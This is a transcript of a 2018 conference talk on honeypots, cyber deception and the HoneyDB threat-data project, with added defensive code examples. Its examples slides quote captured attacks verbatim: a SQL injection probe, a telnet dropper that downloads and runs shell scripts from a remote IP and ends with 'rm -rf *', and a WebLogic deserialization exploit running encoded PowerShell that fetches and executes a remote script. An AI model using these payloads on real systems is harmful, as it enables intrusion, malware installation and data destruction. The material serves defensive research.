Honeypots, Deception, and
Frankenstein
SOURCE Boston 2018
BIO
Career Summary
● WebDev, DBA, SA, IT Auditor (~7 yrs)
● AppSec in Financials, EY & GS (~9 yrs)
On the socials
● Twitter: @foospidy
● Github: http://github.com/foospidy
● LinkedIn: http://linkedin.pxmx.io
● Blog: http://pxmx.io
Phillip Maddux
Trusted AppSec Advisor and
Senior Solutions Engineer
@ Signal Sciences
https://signalsciences.com
Agenda of the Cybers
● Honeypots 101
● Cyber Deception
● HoneyPy - Quick Update
● Frankenstein (HoneyDB Project)
● Q&A
Honeypots 101
A networked computer configured to look like a legitimate system, but whose real purpose is to discover and/or track attackers.
Types of Honeypots:
- Production
- Research
Levels of Interaction:
- Low: emulated services, very limited interaction, no login capability (low risk).
- Medium: emulated services, emulated login, emulated commands.
- High: actual services, system logins, and commands (very risky).
Honeypots 101 - Production Honeypots
Production honeypots are computers on the network that have no legitimate business purpose and should never see any traffic, unless…
- something is misconfigured on the network, or
- there is a malicious actor on the network.
Production honeypots are an additional layer to your defense strategy.
- Honeypot logs are low volume and high value
- Honeypots introduce risk to the attacker
Honeypots 101 - Production Honeypots
Additional Layer to…
Preventative controls
- Network & application firewalls
- Intrusion prevention systems
- Patch management
- Network compartmentalization
- Anti-virus
Detective controls
- Intrusion detection systems
- Network traffic analysis
- Endpoint monitoring
Control validation
- Vulnerability scans
- Audits
- Penetration testing
- Control performance monitoring
Honeypots
- Produce low volumes of data compared to the volumes of data from all other preventative and detective controls
Honeypots 101 - Research Honeypots
Research honeypots can serve many purposes; it depends on what the research goals are.
Examples:
- Identify sources of malicious traffic
- Discover active malware, botnets, and C&C servers
- Learn about attacker techniques & tools
Honeypots 101 - Research Honeypots
(Diagram: traffic from the Internet, labelled bots, scanners, malware, DDoS botnets, etc., arriving at the research honeypots.)
Honeypots 101 - Research Honeypots
ShmooCon 2015
Andrew Morris (@Andrew___Morris): No Budget Threat
Intelligence - Tracking Malware Campaigns on the Cheap
- Reversing malware
- Uncovering c2 servers
- Uncovering imminent ddos attacks
Presentation video
Now doing really cool stuff with…
(https://greynoise.io/)
Honeypots 101 - Hobbyist Honeypots
- Try it out.
- It’s fun!
This is not me.
(this is totally me)
Cyber Deception
The First Rule of Cyber Deception
You Must Show This Image
Deception
Deception technology automates the creation of traps (decoys) and/or lures
which are mixed among and within existing IT resources to provide a layer of
protection to stop attackers that have penetrated the network. Traps (decoys) are
IT assets that either use real licensed operating system software, or are
emulations of these devices. [1]
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
Deception Automation
Automation for:
- Deploying deception endpoints as VMs, containers, or processes.
- Configuration of deception endpoints.
Centralized management interface, or API driven.
Deception Lures
Lures (aka breadcrumbs) - Lures are generally real information technology
resources (files of varying kinds) which are placed on actual IT assets. [1]
- Credentials to network resources or applications.
- Shortcuts to applications or other services, e.g. FTP, Telnet, SSH.
- Browser artifacts, e.g. history, favorites, cookies.
- Database connection strings
- Network drives
- etc.
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
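To make the lure idea concrete, here is an added example (not code from the talk or from any deception product) of planting per-host credential lures and detecting their use. The point a practitioner cares about is that each lure is unique, so the honey username that shows up in an auth log tells you which host the attacker harvested it from. The host list, the SMB-style breadcrumb string and the sshd-style log lines are all constructed for the example:

```python
import re
import secrets

# Constructed sample: hypothetical hosts that will each receive one lure.
HOSTS = ["ws-finance-07", "ws-hr-12", "jump-01"]

# Assumed auth log shape (sshd style): "Failed/Accepted password for USER from IP".
AUTH_RE = re.compile(
    r"(?:Failed|Accepted) password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)"
)


def make_lure(host, target="fileshare.corp.example"):
    """Create one credential lure for one host.

    The username embeds a random tag so that any authentication attempt
    with it can be traced back to the exact host the lure was planted on.
    The credential is valid nowhere; its only purpose is to be tried.
    """
    tag = secrets.token_hex(3)  # 6 hex characters, unique per planted lure
    username = f"svc_backup_{tag}"
    return {
        "host": host,
        "username": username,
        "password": secrets.token_urlsafe(12),
        "target": target,
        # The breadcrumb that actually gets dropped on the host (a connection
        # string style file, a saved RDP/SSH profile, a browser entry, ...).
        "artifact": f"smb://{target}/backups user={username}",
    }


def plant_lures(hosts):
    """Return (registry, lures): registry maps honey username -> planted host.

    The registry is what the detection side needs. It lives with the SIEM or
    deception platform, never on the monitored hosts themselves.
    """
    lures = [make_lure(h) for h in hosts]
    registry = {lure["username"]: lure["host"] for lure in lures}
    return registry, lures


def detect_lure_use(registry, log_lines):
    """Scan auth log lines; any honey username is a high-confidence alert.

    Legitimate users never know these usernames exist, so there is no
    benign explanation for seeing one: low volume, high value.
    """
    alerts = []
    for line in log_lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        user, src = m.group(1), m.group(2)
        if user in registry:
            alerts.append({
                "honey_user": user,
                "planted_on": registry[user],   # the host that was compromised
                "source_ip": src,               # where the credential was tried from
                "raw": line,
            })
    return alerts


if __name__ == "__main__":
    registry, lures = plant_lures(HOSTS)
    for lure in lures:
        print(f"{lure['host']}: drop {lure['artifact']!r}")
    # Constructed log line: the lure from ws-hr-12 is tried against the file server.
    sample = (f"Jan 10 03:12:44 fileshare sshd[812]: Failed password for invalid user "
              f"{lures[1]['username']} from 10.0.0.55 port 51122 ssh2")
    for alert in detect_lure_use(registry, [sample]):
        print("ALERT:", alert["honey_user"], "planted on", alert["planted_on"],
              "used from", alert["source_ip"])
```

The registry is the sensitive part of this scheme: if it is readable from a planted host, the attacker can simply skip the lures, so keep it off the endpoints and treat the honey usernames as detection-only data.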
Deception Solutions
Very fancy implementations of honeypots
Deception Layers
Network services - SSH, Telnet, FTP, etc.
Applications - cookies, directories, logins, functionality, etc.
Data - watermarks, triggers, records access, etc.
Deception in Applications
2017
Herb Todd: Tangled Web: Defense in Deception
- The goals of deception from the perspective of both the attacker and defender
- The elements and processes needed to plan, prepare, execute, and monitor effective deception
- The types of deception techniques that are effective and how they translate into actual web
application capabilities
- How to identify and respond to various types of attackers.
Presentation video
My takeaway - a tailored solution is needed
See, told ya.
Deception Goal
Integrate deception throughout your network and applications
so you become a high risk to attackers
Deception Market
Approximately 20 companies
Raised at least 201 million dollars
Top 5 funded range 19 million to 46 million
2 acquisitions
All this over the last 4, maybe 5 years
Numbers based on data from crunchbase.com as of Fall 2017
Deception Challenges
The concept of honeypots & deception has been around for years
The Cuckoo's Egg - 1989
Bsides Raleigh 2017 (now Bsides RDU) source
Deception Challenges
Why isn’t everyone already doing deception?
Deception Challenges
Maturity
Deception Challenges
Over the last 10 to 15 years organizations have focused on getting the basics done…
● Vulnerability Assessment
● Patch Management
● Endpoint protection
● Network Monitoring (IDS/IPS)
● Controls Validation
● Security awareness / training
Deception
● No resources
● Not a priority
● Not fully understood
Deception Challenges
However, as organizations are becoming more mature in their security programs they are now thinking about deception…
What does a deception program look like for their organization?
Deception Program
Initial thoughts…
● Scope… intruder vs. insider, or both?
● Output... alerts vs. counter intelligence, or both?
● Coverage… external vs. internal, or both?
● Assets… network, applications, data?
● Validation… metrics and testing.
● Incident response… integration and prioritization.
Audit & Compliance?
Deception Challenges
Some other challenges…
● Some existing solutions are heavy/complex to deploy (also operational risk).
● Lures & breadcrumb management.
● Vulnerability scans reporting on sensors.
● Deception data risk (data is fake, incident is real).
● External facing deception can have an impact on security scorecard.
● How to implement deception in 3rd party vendor environments.
Deception Takeaways
Get the basics covered first
Think about your deception story (program)
Investigate solutions that are right sized for your organization’s maturity level
A solution needs to:
- have capability to be tailored
- be easy to deploy
- be easy to automate and integrate
- be lightweight / low touch to manage
Deception Takeaways
Effective Deception
Project Updates
HoneyPy
- Low to medium interaction honeypot.
- Plugin based to implement various network services (tcp or udp).
- Open source, on Github https://github.com/foospidy/HoneyPy
- Written in Python.
- Plugins
- https://github.com/foospidy/HoneyPy/tree/master/plugins
- Service config
- https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg
- Integrations (loggers)
- https://github.com/foospidy/HoneyPy/tree/master/loggers
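As an added illustration of the low-interaction level HoneyPy operates at (example code written for this page, not HoneyPy's own plugin or logger code), the following stand-alone Python honeypot answers with a fake banner, records the first payload as a JSON event and closes the connection. The banners, the ports 2121/2323/2222 and the in-memory event list are assumptions chosen for the example:

```python
import json
import socketserver
import threading
import time

# Hypothetical emulated banners keyed by port. The honeypot never runs the
# real service; it answers with a plausible greeting and records what arrives.
# High ports are used so the example runs unprivileged; a deployment would
# redirect 21/23/22 to them (e.g. with a NAT rule) or run as a capable user.
BANNERS = {
    2121: b"220 (vsFTPd 3.0.3)\r\n",
    2323: b"login: ",
    2222: b"SSH-2.0-OpenSSH_7.4\r\n",
}


def build_event(port, peer, data, ts=None):
    """Turn one client interaction into a structured, logger-friendly event.

    Raw bytes are hex-encoded so binary probes survive JSON serialization;
    the printable preview is for quick triage without decoding.
    """
    return {
        "ts": time.time() if ts is None else ts,
        "service_port": port,
        "remote_ip": peer[0],
        "remote_port": peer[1],
        "bytes": len(data),
        "data_hex": data.hex(),
        "preview": data.decode("utf-8", errors="replace").strip()[:200],
    }


class LowInteractionHandler(socketserver.BaseRequestHandler):
    """Send the banner, read one payload, log it, hang up.

    Nothing the client sends is ever interpreted or executed: that is what
    "low interaction" means and what keeps the honeypot from becoming a liability.
    """

    def handle(self):
        port = self.server.server_address[1]
        self.request.settimeout(5)
        try:
            self.request.sendall(BANNERS.get(port, b""))
            data = self.request.recv(4096)
        except (OSError, ConnectionError):
            data = b""
        event = build_event(port, self.client_address, data)
        self.server.events.append(event)
        print(json.dumps(event))


class HoneyServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, addr):
        super().__init__(addr, LowInteractionHandler)
        self.events = []  # in-memory log; swap for a file, syslog or HTTP logger


def serve(bind_ip="127.0.0.1", ports=BANNERS):
    """Start one listener per emulated port and return the server objects."""
    servers = []
    for port in ports:
        srv = HoneyServer((bind_ip, port))
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        servers.append(srv)
    return servers


if __name__ == "__main__":
    servers = serve()
    print("listening on", [s.server_address for s in servers])
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        for s in servers:
            s.shutdown()
```

The `ThreadingTCPServer` base means a slow or stalled scanner only ties up one thread; the five-second timeout bounds how long that lasts. A medium-interaction service would replace the single `recv` with a loop that emulates responses to commands, which is exactly where the risk and the engineering effort start to grow.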
HoneyDB
HoneyDB is a community driven honeypot data aggregation
service. HoneyDB collects and publishes honeypot data via
its web site and APIs.
honeydb.io
(redirects to riskdiscovery.com/honeydb)
HoneyDB - Features
Data visualization…
HoneyDB - Features
Investigation…
HoneyDB - Features
Threat Information
- Bad-hosts
- Sensor Data
- Twitter Threat Feed
HoneyDB
How does it work?
HoneyDB - Original Architecture
(Diagram; component labelled on the slide: Web API)
HoneyDB - Scale Problem
(Diagram; component labelled on the slide: Web API)
HoneyDB - Reliability Problem
Fun reading…
http://www.cloudatacost.com/mystory
https://www.reddit.com/r/CloudAtCost/
HoneyDB - $$$?
Decent web servers and data storage could run about $400-$500 per month.
Current 90 day storage: 50 GB
HoneyDB - How To Get $$$?
Idea…
Honeypots As A Service
(HaaS)
HoneyDB - You Have To HaaS it!
Attempt a demo.
HoneyDB - Turns Out… You Don’t Have To HaaS it!
Or nobody wants to HaaS it =(
HoneyDB - But Wait, CarolinaCon Connection!
http://novcon.net/
Offered VMs for free!
btw… they also operate the threat info project.
HoneyDB - Reliable Servers
But still need to scale
HoneyDB - Frankenstein
HoneyDB - Frankenstein Cloud Architecture
"Frankenstein scaaaaaaaaaaaaale"
- Frankenstein
(Architecture diagram; components labelled on the slide:)
- Novcon VMs running the HoneyDB web / api
- MySQL (Primary), replicating to MySQL (Secondary)
- Redis - API Request Limiting
- Serverless (functions)
- Google Cloud: PubSub, BigQuery
(Data flows labelled on the slide: get hmac, post events, pull events, pull tweets, stream events, query, inserts, replicate; one path marked "Coming soon".)
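The labels "get hmac" and "Redis - API Request Limiting" on the diagram point at two things every event-collection API needs: sensors must prove the events they post are theirs, and no single sensor (or someone holding a captured request) may flood the pipeline. The following is an added example of how such an endpoint can be built; it is not HoneyDB's actual protocol or code. The sensor id, header names, timestamp window, limits and the in-memory deque standing in for Redis are all assumptions made for the example:

```python
import hashlib
import hmac
import json
import time
from collections import deque

# Constructed for the example: per-sensor shared secrets as the API would hold
# them (issued at sensor registration and stored server-side, never in code).
SENSOR_KEYS = {"sensor-0001": b"example-shared-secret-do-not-reuse"}

MAX_SKEW = 300      # seconds; a signature older than this is treated as a replay
RATE_LIMIT = 5      # accepted requests ...
RATE_WINDOW = 60    # ... per sensor per this many seconds


def canonical(event):
    """Stable JSON bytes so sensor and API hash exactly the same body."""
    return json.dumps(event, sort_keys=True, separators=(",", ":")).encode()


def sign_event(sensor_id, key, event, ts=None):
    """Sensor side: build the headers that accompany canonical(event) as the body.

    The timestamp is bound into the MAC so an old capture cannot be replayed
    outside MAX_SKEW, and the sensor id so one sensor's key cannot vouch for another.
    """
    ts = int(time.time() if ts is None else ts)
    msg = f"{sensor_id}.{ts}.".encode() + canonical(event)
    mac = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return {"X-Sensor-Id": sensor_id, "X-Timestamp": str(ts), "X-Signature": mac}


class EventApi:
    """API side: authenticate, reject stale signatures, then rate limit per sensor."""

    def __init__(self, keys, now=time.time):
        self.keys = keys
        self.now = now          # injectable clock so the behaviour is testable
        self.windows = {}       # sensor_id -> deque of accepted timestamps (Redis in production)
        self.accepted = []      # stand-in for the PubSub/BigQuery pipeline

    def _rate_ok(self, sensor_id, now):
        q = self.windows.setdefault(sensor_id, deque())
        while q and now - q[0] >= RATE_WINDOW:   # drop entries outside the window
            q.popleft()
        if len(q) >= RATE_LIMIT:
            return False
        q.append(now)
        return True

    def post_event(self, headers, body):
        sensor_id = headers.get("X-Sensor-Id", "")
        key = self.keys.get(sensor_id)
        if key is None:
            return 401, "unknown sensor"
        try:
            ts = int(headers.get("X-Timestamp", ""))
        except ValueError:
            return 400, "bad timestamp"
        now = int(self.now())
        if abs(now - ts) > MAX_SKEW:
            return 401, "stale signature"
        expected = hmac.new(key, f"{sensor_id}.{ts}.".encode() + body, hashlib.sha256).hexdigest()
        # Constant-time comparison; a plain == on MACs leaks timing information.
        if not hmac.compare_digest(expected, headers.get("X-Signature", "")):
            return 401, "bad signature"
        # Rate limiting comes after authentication so unauthenticated traffic
        # cannot burn a legitimate sensor's quota.
        if not self._rate_ok(sensor_id, now):
            return 429, "rate limited"
        self.accepted.append(json.loads(body))
        return 202, "accepted"


if __name__ == "__main__":
    api = EventApi(SENSOR_KEYS)
    event = {"service": "telnet", "remote_ip": "203.0.113.9", "data": "cd /tmp"}
    hdrs = sign_event("sensor-0001", SENSOR_KEYS["sensor-0001"], event)
    print(api.post_event(hdrs, canonical(event)))
```

Within the skew window an identical request can still be replayed; if that matters, record each accepted signature (in the same Redis) for MAX_SKEW seconds and reject repeats. Verifying over the body bytes as received, rather than re-serializing the parsed JSON, is what keeps the check independent of the server's JSON library.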
HoneyDB - What about...
Blockchain?
HoneyDB - Blockchain?
Not yet.
HoneyDB - Note On Serverless Functions
IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost.
AWS Lambda is good - robust, but expensive… API gateway charges.
Google Cloud Functions is disappointing - easy to deploy, only nodejs, but… Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why?
Azure Cloud Functions is WTF - couldn't get dependencies to install, never got it running, couldn't waste more time with it.
HoneyDB - Ok, So What Does It Cost?
HoneyDB - How To Money?
Cryptocurrency Mining...
HoneyDB - How To Money?
Not practical, but wrote a cool script...
HoneyMiner
https://github.com/foospidy/HoneyMiner
HoneyDB - How To Money?
Masternodes…
Greater privacy of transactions
Performing immediate transactions
Participation in proceedings and voting
Activate budgeting and cashier system in cryptocurrencies
HoneyDB - How To Money?
Currently running 5 masternodes
across 2 VPS
Yields about $100 to $200 per month.
HoneyDB - But that crypto though.
Masternodes have potential, but require an initial investment, and are at the mercy of market volatility.
HoneyDB - How to money?
Other options…
Sponsorships
Commercial Licensing
HoneyDB - Back To HaaS
Tools to get you honeypotting
● Honeydb-agent
○ Like HoneyPy, but a binary
● API Endpoints
● HoneyDB CLI
HoneyDB - New API Client Wrapper and CLI
pip install honeydb
usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty]
optional arguments:
-h, --help show this help message and exit
--bad-hosts Get bad hosts.
--sensor-data-count Get sensor data count.
--sensor-data Get sensor data.
--threatbin Get ThreatBin entries.
--twitter-threat-feed Get Twitter Threat Feed.
--mydata Filter on mydata.
--date DATE Date in format YYYY-MM-DD
--ip-address IP_ADDRESS IP address to filter on.
--from-id FROM_ID ID to continue retrieving sensor data.
--pretty Print JSON in pretty format.
HoneyDB - CLI/API
Attempt a demo.
HoneyDB - Examples...
Web (a SQL injection probe; CHAR(45,120,49,45,81,45) is the string -x1-Q-, a marker the attacker looks for in the response to confirm injectable columns):
GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)--%20%20 HTTP/1.1
Host: x.x.x.x
Accept: */*
Telnet (a bot dropper: it tries wget, tftp and ftpget in turn to fetch and run a shell script, then removes the scripts):
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
HoneyDB - Examples...
HTTP (a POST that abuses java.beans.XMLDecoder deserialization to start a ProcessBuilder running an encoded PowerShell command; analyzed on the following slides):
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 64.137.163.142:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1216

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>cmd.exe</string>
            </void>
            <void index="1">
              <string>/c</string>
            </void>
            <void index="2">
              <string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4AcABoAHAAJwApADsA</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
HoneyDB - Examples...
The -E argument above, base64-decoded and read as UTF-16LE (the original slide showed the interleaved null bytes rendered as dots):
$OS=(Get-WmiObject -Class Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers.Add('User-Agent',"PowerShell v2.0 $OS");IEX $WC.DownloadString('http://123.59.68.172/Cache/DL.php');
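Decoding such payloads by hand is error prone, and the flag has several spellings, so here is an added example (not part of the talk or of HoneyDB) that pulls the encoded-command argument out of a captured command line, decodes it and extracts indicators. The sample command line is constructed by re-encoding the decoded script shown above the way PowerShell expects (base64 over UTF-16LE); the defanging format is a convention chosen for the example:

```python
import base64
import re

# Constructed sample: the decoded script from the slide, re-encoded as
# PowerShell's -EncodedCommand expects (base64 of the UTF-16LE text).
SAMPLE_SCRIPT = (
    "$OS=(Get-WmiObject -Class Win32_OperatingSystem).Caption;"
    "$WC=New-Object Net.WebClient;"
    "$WC.Headers.Add('User-Agent',\"PowerShell v2.0 $OS\");"
    "IEX $WC.DownloadString('http://123.59.68.172/Cache/DL.php');"
)
SAMPLE_CMDLINE = ("PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode())

URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)


def find_encoded_argument(cmdline):
    """Return the base64 blob following any spelling of -EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix (-e, -ec, -enc, ...) case-insensitively,
    so the flag is matched as a prefix of "encodedcommand" rather than a fixed string.
    -EP (ExecutionPolicy) is not such a prefix and is skipped.
    """
    tokens = cmdline.split()           # the blob itself never contains whitespace
    for i, tok in enumerate(tokens[:-1]):
        if (len(tok) >= 2 and tok[0] in "-/"
                and "encodedcommand".startswith(tok[1:].lower())):
            return tokens[i + 1]
    return None


def decode_encoded_command(blob):
    """base64 -> UTF-16LE text; tolerates stripped padding, quotes and a BOM."""
    blob = blob.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16le").lstrip("\ufeff")


def extract_iocs(script):
    """Pull the network indicators and the download-and-execute pattern out of a script."""
    return {
        "urls": URL_RE.findall(script),
        "ips": sorted(set(IP_RE.findall(script))),
        "downloads_and_executes": bool(EXEC_RE.search(script)
                                       and "downloadstring" in script.lower()),
    }


def defang(indicator):
    """Make a URL/IP safe to paste into a ticket: http -> hxxp, . -> [.]"""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


def analyze(cmdline):
    """Full pipeline for one captured command line."""
    blob = find_encoded_argument(cmdline)
    if blob is None:
        return {"encoded": False, "script": None, "iocs": None}
    script = decode_encoded_command(blob)
    return {"encoded": True, "script": script, "iocs": extract_iocs(script)}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print(result["script"])
    for url in result["iocs"]["urls"]:
        print("fetches:", defang(url))
    print("download-and-execute:", result["iocs"]["downloads_and_executes"])
```

The prefix match is the part worth keeping: detections that look only for the literal string `-EncodedCommand` or `-enc` miss `-e` and `-ec`, which is exactly what this sample uses.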
HoneyDB - @MalwareMechanic
● I analyzed the initial POST you sent me. From there I was able to pull apart a scanner/worm/RAT!
● It appears to be GhostMiner to mine Monero!
HoneyDB - Hmmmmm...
$ cat GhostMiner >> HoneyMiner
HoneyDB - No no no no...
HoneyDB - @MalwareMechanic
● This POST utilizes a Java deserialization
vulnerability to execute a base64 encoded
PowerShell command.
● This in turn downloads and executes a PowerShell
script (hxxp://123.59.68.172/Cache/DL.php).
● Installs a cryptominer via WMI.
● Attempts to stop the various services & tasks
before installing the new miner.
● Attempts to stop other miners.
● Attempts to stop processes listening on specific
ports.
● Also saw references to
powershell_reflective_mimikatz.
HoneyDB - Go Forth and Honeypot!
honeydb.io
Thanks!
Questions?

 
Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!
 
SecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsSecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operations
 
Application security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsApplication security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOps
 
HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)
 
HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)
 
HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)
 

Recently uploaded

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 

Recently uploaded (20)

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
